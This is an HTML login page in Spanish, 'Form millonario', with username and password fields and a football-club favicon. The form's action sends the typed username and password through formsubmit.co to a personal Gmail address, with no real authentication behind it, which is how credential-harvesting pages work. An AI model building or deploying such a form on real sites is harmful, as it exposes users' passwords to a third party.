<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Form millonario - Inicia Sesion</title>
    <link rel="stylesheet" href="style.css">
    <link href='https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css' rel='stylesheet'>
    <link rel="icon" href="/img/loguito-river.png" />
</head>
<body>
    <main class="contenedor">
        <form action="https://formsubmit.co/nicotraversaro10@gmail.com" method="POST">
            <h1 >Iniciar Sesión</h1>
            <div class="entradas">
                <input type="text" name="usuario" placeholder="usuario">
                <i class='bx bxs-user'></i>
            </div>
            <div class="entradas">
                <input type="password" name="contraseña" placeholder="contraseña">
                <i class='bx bxs-lock'></i>
            </div>
            <div class="recordarme">
                <label>
                    <input type="checkbox" name="recordarle">Recordarme
                </label>
                <a href="#">Olvidaste tu contraseña?</a>
            </div>
            <button type="submit" class="boton">Ingresar</button>
            <div class="final">
                <p>No tienes cuenta? <a href="#">registrarme</a></p>
            </div>
        </form>
    </main>
</body>
</html>


<!-- <box-icon type='solid' name='user'></box-icon>  user -->
<!-- <box-icon type='solid' name='lock'></box-icon>  lock -->
